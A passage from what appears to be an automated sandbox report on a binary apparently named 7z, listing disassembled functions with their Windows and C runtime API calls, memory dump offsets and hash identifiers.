                                • Opcode Fuzzy Hash: 2438c4d46c2d3bedd8f8d32da497e8a1ec4bb712b86c7c0aadf2914d42ad0083
                                • Instruction Fuzzy Hash: 2E01883234874182DA209B2295902EE07649B8A7F8F584326AE6987795DF1DCDC7D708
                                Function 004186C8 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AttributesFilefree
                                • String ID:
                                • API String ID: 1936811914-0
                                • Opcode ID: f3a7bfe2fbeb8eaaa86e59d7df9951e83bc08cde47471fedabe96c3adb9c62b3
                                • Instruction ID: 4545208c1392738d9dd9c67bb5d3803fb2447f066cb6af941386eb90cdfc2da9
                                • Opcode Fuzzy Hash: f3a7bfe2fbeb8eaaa86e59d7df9951e83bc08cde47471fedabe96c3adb9c62b3
                                • Instruction Fuzzy Hash: 73F0367230464486C920AB35EED42AD5321A7897F8F540326EE7D967E5DF1CCDC68708
                                Function 0043C694 Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 3d4e3d313a12ffc0cbc2ef8ed08529013286d5a7e115bc917af8f605999ee648
                                • Instruction ID: 0bd5f5195469efb93ef6dd78bd0710dd15b4de06bdf7809411de535c20f7a2c3
                                • Opcode Fuzzy Hash: 3d4e3d313a12ffc0cbc2ef8ed08529013286d5a7e115bc917af8f605999ee648
                                • Instruction Fuzzy Hash: 6A516D72604A8497CA30EB16E88029E7320F789BD8F40521BDF9D57B59DF3CD5A5CB48
                                Function 00438580 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6e3fada83e1e8ae34f328cb636aa625eae3db3a74b5cde4ffc27f04f2bbbb36f
                                • Instruction ID: 33ccff7bac7674b26bbc5f90ba0d776ac15abd0e7ffc3277c4e4dd1c85ae5435
                                • Opcode Fuzzy Hash: 6e3fada83e1e8ae34f328cb636aa625eae3db3a74b5cde4ffc27f04f2bbbb36f
                                • Instruction Fuzzy Hash: D611E43220074890CF20EB22E9021AFA321E7D5BE9F54A21BBE5D437A5DF6CC5C5CB08
                                Function 00419A94 Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                • CreateFileW.KERNELBASE ref: 00419B09
                                • CreateFileW.KERNEL32 ref: 00419B5C
                                • free.MSVCRT ref: 00419B6A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CreateFile$CloseHandlefree
                                • String ID:
                                • API String ID: 210839660-0
                                • Opcode ID: 1af0fe19b8f36ceeec8826d48cab967aca2ab12d8a160945025a9147185218b0
                                • Instruction ID: c51dad318d743d060977df6b6bf511d651fa602da221412d5b618d7490690a2b
                                • Opcode Fuzzy Hash: 1af0fe19b8f36ceeec8826d48cab967aca2ab12d8a160945025a9147185218b0
                                • Instruction Fuzzy Hash: C121A1322086819AC7209F16B95169A6764F3857F8F440326EFB9437D4DB3CC8A6CB08
                                Function 004629A8 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004135B8: memmove.MSVCRT ref: 004135F0
                                • fputs.MSVCRT ref: 004629ED
                                • fputs.MSVCRT ref: 00462A7B
                                • free.MSVCRT ref: 00462AAB
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$fputcfreememmove
                                • String ID:
                                • API String ID: 1158454270-0
                                • Opcode ID: b8f371b20783ed2fef9b4bf64ec7a3b7bde92c15ff7cc82641821b3dd174b0f0
                                • Instruction ID: e7492073f4c8e21ec3b580a7881a3e90d47c2bb15cda2ee8d983f57cfa513350
                                • Opcode Fuzzy Hash: b8f371b20783ed2fef9b4bf64ec7a3b7bde92c15ff7cc82641821b3dd174b0f0
                                • Instruction Fuzzy Hash: 8F21A9A1314A0191CF34EF16E51139F2361EB84BE8F445222DE5E87795EFBCC590C709
                                Function 004196F8 Relevance: 4.5, APIs: 3, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00419BD5), ref: 00419736
                                • GetLastError.KERNEL32 ref: 00419743
                                • SetLastError.KERNEL32 ref: 0041975C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast$FilePointer
                                • String ID:
                                • API String ID: 1156039329-0
                                • Opcode ID: f50b3b5956e4207cef3ae29d8347eb7a38ec24be7dbd0c56f2053341d10d5ebe
                                • Instruction ID: cbe307a7f3b7321964d6a9922f490012c2a3d1a32b0ca6e60fcdf6daa351c976
                                • Opcode Fuzzy Hash: f50b3b5956e4207cef3ae29d8347eb7a38ec24be7dbd0c56f2053341d10d5ebe
                                • Instruction Fuzzy Hash: EC014CB6B21284C7EF255F76A8143A963429F44BE4F584122CE1947B90DF7CCCC2C704
                                Function 00412790 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputsmemmove
                                • String ID:
                                • API String ID: 4106585527-0
                                • Opcode ID: 23fb8626e5c083572e28144598607edd5a0ad35f97957df7a3c39277dd8c4639
                                • Instruction ID: 75edbae18a2eb098ad8ebaa10cbb66c3678df011c6b940e0cba5a7df847ee343
                                • Opcode Fuzzy Hash: 23fb8626e5c083572e28144598607edd5a0ad35f97957df7a3c39277dd8c4639
                                • Instruction Fuzzy Hash: C9F0966220498891CA20DB26EA4109E6721EBC5BF8F841312BE6E47BB8CF2CC595C704
                                Function 004126D8 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputsmemmove
                                • String ID:
                                • API String ID: 4106585527-0
                                • Opcode ID: 615417141882d484608d01c49fd5f9f5563eb28e4721ab9f04b0de3293a9f672
                                • Instruction ID: 82c2b7f7e5d040cad63dfe2d01d214cf60cba150c4cbf548e8476ae380673c8d
                                • Opcode Fuzzy Hash: 615417141882d484608d01c49fd5f9f5563eb28e4721ab9f04b0de3293a9f672
                                • Instruction Fuzzy Hash: 3DF09672204A4591CE20EB22F45119A6721E7C5BF8F442313BAAF876B9CF6CC1D5C708
                                Function 0041F148 Relevance: 3.9, APIs: 3, Instructions: 178COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast$memmove
                                • String ID:
                                • API String ID: 3796167841-0
                                • Opcode ID: 7e677ca5909d1abcf7487877d2748dc86e450147a03828933a66653d50f1b6dc
                                • Instruction ID: 1fce1b770aaed40b43412d0d33615fd2d0c2e4c06ded5665f9b43eb4ff3e2e4d
                                • Opcode Fuzzy Hash: 7e677ca5909d1abcf7487877d2748dc86e450147a03828933a66653d50f1b6dc
                                • Instruction Fuzzy Hash: 9B517D76711B59A7DB24CA7AD6403EA2390FB04794F14053B9F1A87B40DB3DD8AAC349
                                Function 0042CF90 Relevance: 3.8, APIs: 3, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: aed28ef6ba745056bcda24ea4d902b9f81d89b86785dc90adf63accb6bb7f7ce
                                • Instruction ID: 99eff6e4578237f1f79494a7d4c01d80cd3378600d491cfcfb27719e1e7b3d83
                                • Opcode Fuzzy Hash: aed28ef6ba745056bcda24ea4d902b9f81d89b86785dc90adf63accb6bb7f7ce
                                • Instruction Fuzzy Hash: FC21C2637006909AD720DF36E99039E2B50E741BFCF98432AEE284B7D8CB3CC5868344
                                Function 00447DDC Relevance: 3.8, APIs: 3, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrowfreememmove
                                • String ID:
                                • API String ID: 73398970-0
                                • Opcode ID: a41e3c5ac00361d37de09403774ffb8de9f8ed958ce3a8040214bf9fe844329d
                                • Instruction ID: 7d9465fa3c328d45a5b9711fea0cc6aa6854a6b831e841a5878a60082189cf3c
                                • Opcode Fuzzy Hash: a41e3c5ac00361d37de09403774ffb8de9f8ed958ce3a8040214bf9fe844329d
                                • Instruction Fuzzy Hash: EA01D47270058886DB189B76D85126DB365E78CB98F28C52ADB1A87398DF3CCC87CB05
                                Function 004124C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputc
                                • String ID: Kernel
                                • API String ID: 1992160199-1736990243
                                • Opcode ID: ac98a9b7465604b7535c7a7ef0938ac82fa11a4959d8ec2f11bc57e26ce40c2f
                                • Instruction ID: b10bb9012dfff9a41921a16a6eb40da743b188a8dfd4776b2beaefd110a196d8
                                • Opcode Fuzzy Hash: ac98a9b7465604b7535c7a7ef0938ac82fa11a4959d8ec2f11bc57e26ce40c2f
                                • Instruction Fuzzy Hash: 4FC09B95755508C3EF1417B7E4453251211D75DF95F185020DF1D4B3508A1CD4D68715
                                Function 0046B4D0 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0046B515
                                • fputs.MSVCRT ref: 0046B53A
                                  • Part of subcall function 00412C70: _CxxThrowException.MSVCRT ref: 00412C99
                                  • Part of subcall function 00412C70: free.MSVCRT ref: 00412CB1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrowfputsfreememset
                                • String ID:
                                • API String ID: 3104931167-0
                                • Opcode ID: 7dff0b48a21762c0c8d1a040b5640c1ee2e5c9c4bf4e68f1b691e4430e0ff499
                                • Instruction ID: 7bd9e33bbfd5cd594259873283ea4bc47d7a95a97d45ff2b07052b9224b15e65
                                • Opcode Fuzzy Hash: 7dff0b48a21762c0c8d1a040b5640c1ee2e5c9c4bf4e68f1b691e4430e0ff499
                                • Instruction Fuzzy Hash: 1301A177700690A6E705DF2BDA8079E2724F759B98F488022CF4847701EB78D8E6C355
                                Function 004601FC Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputcfputsfree
                                • String ID:
                                • API String ID: 2822829076-0
                                • Opcode ID: 6d43cf9adcf5d8bd29a5413fd1cc6de7e18cd19a474ce465f2e19c84917248f5
                                • Instruction ID: a535ad51baf41fdce7dc3e2fbd22918ffee4c7c798ea7eba2c316976f5c59046
                                • Opcode Fuzzy Hash: 6d43cf9adcf5d8bd29a5413fd1cc6de7e18cd19a474ce465f2e19c84917248f5
                                • Instruction Fuzzy Hash: 61F08963200A4481CA20DB26E95535E5320D7C9BFCF4843259E6D477E5DF2CC9D5C708
                                Function 0045339A Relevance: 2.6, APIs: 2, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                • memmove.MSVCRT ref: 004533B2
                                • memmove.MSVCRT ref: 004533EC
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memmove$ExceptionThrowfree$malloc
                                • String ID:
                                • API String ID: 459785443-0
                                • Opcode ID: f21c7df75ff83531f38c2324bb30a4aaeb48bfca4b818964c93176b96b13a56d
                                • Instruction ID: 1af0127a0cdcd409c8955679c5f83f7510920be0f23fbe25108677efb80f1cc8
                                • Opcode Fuzzy Hash: f21c7df75ff83531f38c2324bb30a4aaeb48bfca4b818964c93176b96b13a56d
                                • Instruction Fuzzy Hash: C541D2B3205AC5A6CA31EF15E1942DEB760F384785F404517CB9983B56DF3CD6AACB00
                                Function 004533B9 Relevance: 2.6, APIs: 2, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • memmove.MSVCRT ref: 004533CA
                                • memmove.MSVCRT ref: 004533EC
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memmove$ExceptionThrowfree$malloc
                                • String ID:
                                • API String ID: 459785443-0
                                • Opcode ID: f4f142c8aef3c130e3ffb33c015ada02217bb5c554caf64af25774bb284e0c43
                                • Instruction ID: dadb4c25438c7b048eeb9fb6cb1294f986c109e6777874bc37b5e2dab4c37367
                                • Opcode Fuzzy Hash: f4f142c8aef3c130e3ffb33c015ada02217bb5c554caf64af25774bb284e0c43
                                • Instruction Fuzzy Hash: 1521B8722049C592CA21EF16E4942DEA310F381796F50852BDB9E47B55DF3CD699C704
                                Function 0044841C Relevance: 2.5, APIs: 2, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: fb399b51651309d117b4786408329f972b9fb6fbc257598f9b8565205b3e11c6
                                • Instruction ID: 70112fdbbdfe5a7694bea32e4f9c0fd190629218342ddec5139cfc84e6f56bea
                                • Opcode Fuzzy Hash: fb399b51651309d117b4786408329f972b9fb6fbc257598f9b8565205b3e11c6
                                • Instruction Fuzzy Hash: 0FF08137342B5987EA20AA26E94016E6310AB45FB9F09432ADF7917BD0DF2CC957C308
                                Function 00413730 Relevance: 2.5, APIs: 2, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 0041376A
                                • memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememmove
                                • String ID:
                                • API String ID: 2988784210-0
                                • Opcode ID: 05a2de85825e951d03016b47982309e09b1eb4b28b1f4d34a2805a34c18de08d
                                • Instruction ID: 941dc5bdfbe6b52cf537fbe48b910aa32a5ba8b8d7432295c6986e0e1bb38672
                                • Opcode Fuzzy Hash: 05a2de85825e951d03016b47982309e09b1eb4b28b1f4d34a2805a34c18de08d
                                • Instruction Fuzzy Hash: 56F0F6B3B0164496CA25AF07E9400AEF320E794BD4744C1228FAD47740EB7CE9D3C700
                                Function 00460284 Relevance: 2.5, APIs: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 00460298
                                • LeaveCriticalSection.KERNEL32 ref: 004602CC
                                  • Part of subcall function 0046B774: GetTickCount.KERNEL32 ref: 0046B794
                                  • Part of subcall function 0046B774: strcmp.MSVCRT ref: 0046B7DA
                                  • Part of subcall function 0046B774: wcscmp.MSVCRT ref: 0046B7FA
                                  • Part of subcall function 0046B774: strcmp.MSVCRT ref: 0046B862
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                • String ID:
                                • API String ID: 3267814326-0
                                • Opcode ID: 833732d14ef6c0506e1edc0579892d3c753ea11d7fa4a44d78749cf595f9ff9a
                                • Instruction ID: 26032809610e61a7395890b6e22f42545e06a761c069b0a7d0fd2b8f96426fb7
                                • Opcode Fuzzy Hash: 833732d14ef6c0506e1edc0579892d3c753ea11d7fa4a44d78749cf595f9ff9a
                                • Instruction Fuzzy Hash: CBF06DA524064A82EB009F20E8C47A82360F749B99F840235CF0E86260EB3C89CCC758
                                Function 00412350 Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 2436765578-0
                                • Opcode ID: 761da570273301f57cb3c724173f51dde4d4af1ca4fe2fbc66553b6d42a3ddde
                                • Instruction ID: 66722ef17964e03b1e1dff1ab712dae333136d9d559f09aff90ee28e90398580
